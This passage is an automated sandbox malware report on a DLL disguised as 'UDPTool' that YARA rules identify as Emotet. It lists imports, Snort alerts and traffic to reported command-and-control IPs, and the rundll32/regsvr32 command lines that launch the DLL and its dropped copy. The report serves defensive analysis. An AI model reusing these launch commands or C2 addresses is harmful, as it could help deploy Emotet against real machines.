                                                                                                      RT_ICON0x5efc40x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 67108992, next used block 3293332676ChineseChina
                                                                                                      RT_ICON0x5f2ac0x128GLS_BINARY_LSB_FIRSTChineseChina
                                                                                                      RT_DIALOG0x5f3d40x33cdataChineseChina
                                                                                                      RT_DIALOG0x5f7100xe2dataChineseChina
                                                                                                      RT_DIALOG0x5f7f40x34dataChineseChina
                                                                                                      RT_STRING0x5f8280x54dataChineseChina
                                                                                                      RT_STRING0x5f87c0x2cdataChineseChina
                                                                                                      RT_STRING0x5f8a80x82dataChineseChina
                                                                                                      RT_STRING0x5f92c0x1d0dataChineseChina
                                                                                                      RT_STRING0x5fafc0x164dataChineseChina
                                                                                                      RT_STRING0x5fc600x132dataChineseChina
                                                                                                      RT_STRING0x5fd940x50dataChineseChina
                                                                                                      RT_STRING0x5fde40x40dataChineseChina
                                                                                                      RT_STRING0x5fe240x6adataChineseChina
                                                                                                      RT_STRING0x5fe900x1d6dataChineseChina
                                                                                                      RT_STRING0x600680x110dataChineseChina
                                                                                                      RT_STRING0x601780x24dataChineseChina
                                                                                                      RT_STRING0x6019c0x30dataChineseChina
                                                                                                      RT_GROUP_CURSOR0x601cc0x22Lotus unknown worksheet or configuration, revision 0x2ChineseChina
                                                                                                      RT_GROUP_CURSOR0x601f00x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina
                                                                                                      RT_GROUP_CURSOR0x602040x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina
                                                                                                      RT_GROUP_CURSOR0x602180x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina
                                                                                                      RT_GROUP_CURSOR0x6022c0x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina
                                                                                                      RT_GROUP_CURSOR0x602400x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina
                                                                                                      RT_GROUP_CURSOR0x602540x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina
                                                                                                      RT_GROUP_CURSOR0x602680x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina
                                                                                                      RT_GROUP_CURSOR0x6027c0x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina
                                                                                                      RT_GROUP_CURSOR0x602900x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina
                                                                                                      RT_GROUP_CURSOR0x602a40x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina
                                                                                                      RT_GROUP_CURSOR0x602b80x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina
                                                                                                      RT_GROUP_CURSOR0x602cc0x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina
                                                                                                      RT_GROUP_CURSOR0x602e00x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina
                                                                                                      RT_GROUP_CURSOR0x602f40x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina
                                                                                                      RT_GROUP_ICON0x603080x22dataChineseChina
                                                                                                      RT_VERSION0x6032c0x2e0dataChineseChina
                                                                                                      RT_MANIFEST0x6060c0x56ASCII text, with CRLF line terminatorsEnglishUnited States

                                                                                                      Imports

                                                                                                      DLLImport
                                                                                                      KERNEL32.dllCreateFileA, GetCPInfo, GetOEMCP, RtlUnwind, HeapReAlloc, GetCommandLineA, RaiseException, ExitProcess, HeapSize, HeapDestroy, HeapCreate, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetACP, LCMapStringW, GetStdHandle, SetHandleCount, GetFileType, GetStartupInfoA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, GetConsoleCP, GetConsoleMode, GetStringTypeA, GetStringTypeW, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, GetCurrentProcess, GetThreadLocale, FlushFileBuffers, SetFilePointer, WriteFile, ReadFile, GlobalFlags, WritePrivateProfileStringA, TlsFree, DeleteCriticalSection, LocalReAlloc, TlsSetValue, TlsAlloc, InitializeCriticalSection, GlobalHandle, GlobalReAlloc, EnterCriticalSection, TlsGetValue, LeaveCriticalSection, LocalAlloc, InterlockedIncrement, GlobalGetAtomNameA, GlobalFindAtomA, lstrcmpW, GetVersionExA, InterlockedDecrement, FreeResource, GetCurrentProcessId, GlobalAddAtomA, GetCurrentThread, GetCurrentThreadId, ConvertDefaultLocale, GetModuleFileNameA, EnumResourceLanguagesA, GetLocaleInfoA, lstrcmpA, GlobalDeleteAtom, GetModuleHandleA, GlobalFree, GlobalAlloc, GlobalLock, GlobalUnlock, FormatMessageA, LocalFree, FindResourceA, LoadResource, LockResource, SizeofResource, MulDiv, CreateThread, CloseHandle, HeapFree, GetNativeSystemInfo, GetProcessHeap, HeapAlloc, FreeLibrary, GetProcAddress, LoadLibraryA, IsBadReadPtr, VirtualProtect, SetLastError, VirtualAlloc, VirtualFree, VirtualQuery, Sleep, GetLastError, lstrlenA, WideCharToMultiByte, CompareStringA, MultiByteToWideChar, GetVersion, LCMapStringA, InterlockedExchange
                                                                                                      USER32.dllLoadCursorA, GetSysColorBrush, EndPaint, BeginPaint, ReleaseDC, GetDC, ClientToScreen, GrayStringA, DrawTextExA, DrawTextA, TabbedTextOutA, SetWindowTextA, IsDialogMessageA, SetDlgItemTextA, GetDlgItemTextA, RegisterWindowMessageA, SendDlgItemMessageA, WinHelpA, GetCapture, GetClassLongA, GetClassNameA, SetPropA, GetPropA, RemovePropA, SetFocus, GetWindowTextLengthA, GetWindowTextA, GetForegroundWindow, GetTopWindow, GetMessageTime, MapWindowPoints, SetForegroundWindow, UpdateWindow, GetMenu, CreateWindowExA, GetClassInfoExA, GetClassInfoA, RegisterClassA, GetSysColor, CopyRect, PtInRect, GetDlgCtrlID, DefWindowProcA, CallWindowProcA, SetWindowLongA, SetWindowPos, SystemParametersInfoA, GetWindowPlacement, GetWindowRect, GetWindow, UnhookWindowsHookEx, GetDesktopWindow, SetActiveWindow, CreateDialogIndirectParamA, DestroyWindow, IsWindow, GetDlgItem, GetNextDlgTabItem, EndDialog, GetWindowThreadProcessId, GetWindowLongA, GetLastActivePopup, IsWindowEnabled, MessageBoxA, SetCursor, SetWindowsHookExA, CallNextHookEx, GetMessageA, TranslateMessage, DispatchMessageA, GetActiveWindow, IsWindowVisible, GetKeyState, PeekMessageA, GetCursorPos, ValidateRect, SetMenuItemBitmaps, DestroyMenu, UnregisterClassA, GetMessagePos, GetMenuCheckMarkDimensions, LoadBitmapA, GetFocus, GetParent, ModifyMenuA, EnableMenuItem, CheckMenuItem, PostQuitMessage, GetMenuState, GetMenuItemID, GetMenuItemCount, GetSubMenu, SetTimer, KillTimer, IsIconic, GetSystemMetrics, GetClientRect, DrawIcon, SendMessageA, ShowWindow, EnableWindow, LoadIconA, PostMessageA, AdjustWindowRectEx
                                                                                                      GDI32.dllSetWindowExtEx, ScaleWindowExtEx, DeleteDC, GetStockObject, ScaleViewportExtEx, SetViewportExtEx, OffsetViewportOrgEx, SetViewportOrgEx, SelectObject, Escape, ExtTextOutA, TextOutA, RectVisible, PtVisible, GetDeviceCaps, DeleteObject, SetMapMode, RestoreDC, SaveDC, GetObjectA, SetBkColor, SetTextColor, GetClipBox, CreateBitmap
                                                                                                      WINSPOOL.DRVDocumentPropertiesA, ClosePrinter, OpenPrinterA
                                                                                                      ADVAPI32.dllRegSetValueExA, RegCreateKeyExA, RegQueryValueA, RegEnumKeyA, RegDeleteKeyA, RegOpenKeyExA, RegQueryValueExA, RegOpenKeyA, RegCloseKey
                                                                                                      SHLWAPI.dllPathFindExtensionA
                                                                                                      OLEAUT32.dllVariantClear, VariantChangeType, VariantInit
                                                                                                      WS2_32.dllsendto, recvfrom, WSAStartup, inet_addr, htons, socket, bind, setsockopt, WSACleanup, closesocket, htonl

                                                                                                      Exports

                                                                                                      NameOrdinalAddress
                                                                                                      DllRegisterServer10x10008af0

                                                                                                      Version Infos

                                                                                                      DescriptionData
                                                                                                      LegalCopyright (C) 2014
                                                                                                      InternalNameUDPTool
                                                                                                      FileVersion1, 0, 0, 1
                                                                                                      CompanyName
                                                                                                      LegalTrademarks
                                                                                                      ProductNameUDPTool
                                                                                                      ProductVersion1, 0, 0, 1
                                                                                                      FileDescriptionUDPTool Microsoft
                                                                                                      OriginalFilenameUDPTool.EXE
                                                                                                      Translation0x0804 0x04b0

                                                                                                      Possible Origin

                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                      ChineseChina
                                                                                                      EnglishUnited States

                                                                                                      Network Behavior

                                                                                                      Snort IDS Alerts

                                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                      01/14/22-10:39:39.106239TCP2404332ET CNC Feodo Tracker Reported CnC Server TCP group 174974880192.168.2.345.138.98.34
                                                                                                      01/14/22-10:39:40.292302TCP2404338ET CNC Feodo Tracker Reported CnC Server TCP group 20497498080192.168.2.369.16.218.101

                                                                                                      Network Port Distribution

                                                                                                      TCP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Jan 14, 2022 10:39:39.106239080 CET4974880192.168.2.345.138.98.34
                                                                                                      Jan 14, 2022 10:39:39.123187065 CET804974845.138.98.34192.168.2.3
                                                                                                      Jan 14, 2022 10:39:39.689399004 CET4974880192.168.2.345.138.98.34
                                                                                                      Jan 14, 2022 10:39:39.706671953 CET804974845.138.98.34192.168.2.3
                                                                                                      Jan 14, 2022 10:39:40.267855883 CET4974880192.168.2.345.138.98.34
                                                                                                      Jan 14, 2022 10:39:40.284703016 CET804974845.138.98.34192.168.2.3
                                                                                                      Jan 14, 2022 10:39:40.292301893 CET497498080192.168.2.369.16.218.101
                                                                                                      Jan 14, 2022 10:39:40.421871901 CET80804974969.16.218.101192.168.2.3
                                                                                                      Jan 14, 2022 10:39:40.422004938 CET497498080192.168.2.369.16.218.101
                                                                                                      Jan 14, 2022 10:39:40.440761089 CET497498080192.168.2.369.16.218.101
                                                                                                      Jan 14, 2022 10:39:40.571970940 CET80804974969.16.218.101192.168.2.3
                                                                                                      Jan 14, 2022 10:39:40.584789991 CET80804974969.16.218.101192.168.2.3
                                                                                                      Jan 14, 2022 10:39:40.584814072 CET80804974969.16.218.101192.168.2.3
                                                                                                      Jan 14, 2022 10:39:40.585019112 CET497498080192.168.2.369.16.218.101
                                                                                                      Jan 14, 2022 10:39:43.453438044 CET497498080192.168.2.369.16.218.101
                                                                                                      Jan 14, 2022 10:39:43.583108902 CET80804974969.16.218.101192.168.2.3
                                                                                                      Jan 14, 2022 10:39:43.583679914 CET80804974969.16.218.101192.168.2.3
                                                                                                      Jan 14, 2022 10:39:43.583842039 CET497498080192.168.2.369.16.218.101
                                                                                                      Jan 14, 2022 10:39:43.587878942 CET497498080192.168.2.369.16.218.101
                                                                                                      Jan 14, 2022 10:39:43.717506886 CET80804974969.16.218.101192.168.2.3
                                                                                                      Jan 14, 2022 10:39:44.243675947 CET80804974969.16.218.101192.168.2.3
                                                                                                      Jan 14, 2022 10:39:44.246721029 CET497498080192.168.2.369.16.218.101
                                                                                                      Jan 14, 2022 10:39:47.259376049 CET80804974969.16.218.101192.168.2.3
                                                                                                      Jan 14, 2022 10:39:47.259411097 CET80804974969.16.218.101192.168.2.3
                                                                                                      Jan 14, 2022 10:39:47.259488106 CET497498080192.168.2.369.16.218.101
                                                                                                      Jan 14, 2022 10:41:29.087491035 CET497498080192.168.2.369.16.218.101
                                                                                                      Jan 14, 2022 10:41:29.087542057 CET497498080192.168.2.369.16.218.101

                                                                                                      DNS Answers

                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                      Jan 14, 2022 10:40:06.500219107 CET8.8.8.8192.168.2.30x6605No error (0)windowsupdate.s.llnwi.net41.63.96.128A (IP address)IN (0x0001)

                                                                                                      Code Manipulations

                                                                                                      Statistics

                                                                                                      CPU Usage

                                                                                                      Click to jump to process

                                                                                                      Memory Usage

                                                                                                      Click to jump to process

                                                                                                      High Level Behavior Distribution

                                                                                                      Click to dive into process behavior distribution

                                                                                                      Behavior

                                                                                                      Click to jump to process

                                                                                                      System Behavior

                                                                                                      General

                                                                                                      Start time:10:39:19
                                                                                                      Start date:14/01/2022
                                                                                                      Path:C:\Windows\System32\loaddll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:loaddll32.exe "C:\Users\user\Desktop\pugKLanrj3.dll"
                                                                                                      Imagebase:0xe50000
                                                                                                      File size:116736 bytes
                                                                                                      MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:moderate

                                                                                                      General

                                                                                                      Start time:10:39:19
                                                                                                      Start date:14/01/2022
                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\pugKLanrj3.dll",#1
                                                                                                      Imagebase:0xd80000
                                                                                                      File size:232960 bytes
                                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      General

                                                                                                      Start time:10:39:20
                                                                                                      Start date:14/01/2022
                                                                                                      Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:regsvr32.exe /s C:\Users\user\Desktop\pugKLanrj3.dll
                                                                                                      Imagebase:0xfd0000
                                                                                                      File size:20992 bytes
                                                                                                      MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.303434167.0000000000D20000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.303487631.0000000000ED1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      Reputation:high

                                                                                                      General

                                                                                                      Start time:10:39:20
                                                                                                      Start date:14/01/2022
                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:rundll32.exe "C:\Users\user\Desktop\pugKLanrj3.dll",#1
                                                                                                      Imagebase:0xd50000
                                                                                                      File size:61952 bytes
                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.303864837.0000000002E50000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.303938818.0000000003091000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      Reputation:high

                                                                                                      General

                                                                                                      Start time:10:39:21
                                                                                                      Start date:14/01/2022
                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:rundll32.exe C:\Users\user\Desktop\pugKLanrj3.dll,DllRegisterServer
                                                                                                      Imagebase:0xd50000
                                                                                                      File size:61952 bytes
                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.312426426.0000000004790000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.310675126.00000000006C1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.312707880.0000000004991000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.312062487.0000000004571000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.312157578.0000000004630000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.310610436.0000000000690000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.312211500.0000000004661000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.312650834.0000000004960000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.311999484.0000000004540000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.312609575.0000000004821000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.312500126.00000000047C1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.312556159.00000000047F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      Reputation:high

                                                                                                      General

                                                                                                      Start time:10:39:22
                                                                                                      Start date:14/01/2022
                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\pugKLanrj3.dll",DllRegisterServer
                                                                                                      Imagebase:0xd50000
                                                                                                      File size:61952 bytes
                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      General

                                                                                                      Start time:10:39:22
                                                                                                      Start date:14/01/2022
                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\pugKLanrj3.dll",DllRegisterServer
                                                                                                      Imagebase:0xd50000
                                                                                                      File size:61952 bytes
                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.308556502.0000000004971000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.308717246.0000000004ED1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.308496197.00000000047A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.308585132.0000000004D20000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.308691982.0000000004EA0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.308783720.0000000004FE1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.308811399.0000000005011000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.308759081.0000000004FB0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      Reputation:high

                                                                                                      General

                                                                                                      Start time:10:39:24
                                                                                                      Start date:14/01/2022
                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ubjbeaftth\ufcmfnoys.ulp",EgkecrKVKe
                                                                                                      Imagebase:0xd50000
                                                                                                      File size:61952 bytes
                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.312591906.0000000002E30000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.312633523.0000000002E61000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      Reputation:high

                                                                                                      General

                                                                                                      Start time:10:39:26
                                                                                                      Start date:14/01/2022
                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Ubjbeaftth\ufcmfnoys.ulp",DllRegisterServer
                                                                                                      Imagebase:0xd50000
                                                                                                      File size:61952 bytes
                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.818600479.0000000004CA1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.816263427.0000000000551000.00000020.00000010.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.818149949.0000000004821000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.818434536.0000000004B90000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.818253319.00000000049B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.818342645.0000000004A90000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.816816895.00000000006C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.818930567.0000000004F70000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.818769110.0000000004E70000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.818077767.0000000004741000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.818990382.0000000004FA1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.818118455.00000000047F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.818553417.0000000004C70000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.818862903.0000000004EA1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.818277549.00000000049E1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.819036173.0000000004FD0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.818224414.0000000004981000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.818194001.0000000004950000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.819084555.0000000005001000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.816889903.0000000000721000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.816215619.0000000000520000.00000040.00000010.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.818044267.0000000004710000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.818377834.0000000004AC1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.818471974.0000000004BC1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      Reputation:high

                                                                                                      General

                                                                                                      Start time:10:39:38
                                                                                                      Start date:14/01/2022
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                      Imagebase:0x7ff70d6e0000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      General

                                                                                                      Start time:10:39:44
                                                                                                      Start date:14/01/2022
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                      Imagebase:0x7ff70d6e0000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      General

                                                                                                      Start time:10:39:59
                                                                                                      Start date:14/01/2022
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                      Imagebase:0x7ff70d6e0000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      General

                                                                                                      Start time:10:40:09
                                                                                                      Start date:14/01/2022
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                      Imagebase:0x7ff70d6e0000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Disassembly

                                                                                                      Code Analysis

                                                                                                      Reset < >

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:6.2%
                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                        Signature Coverage:14%
                                                                                                        Total number of Nodes:1382
                                                                                                        Total number of Limit Nodes:15

                                                                                                        Graph

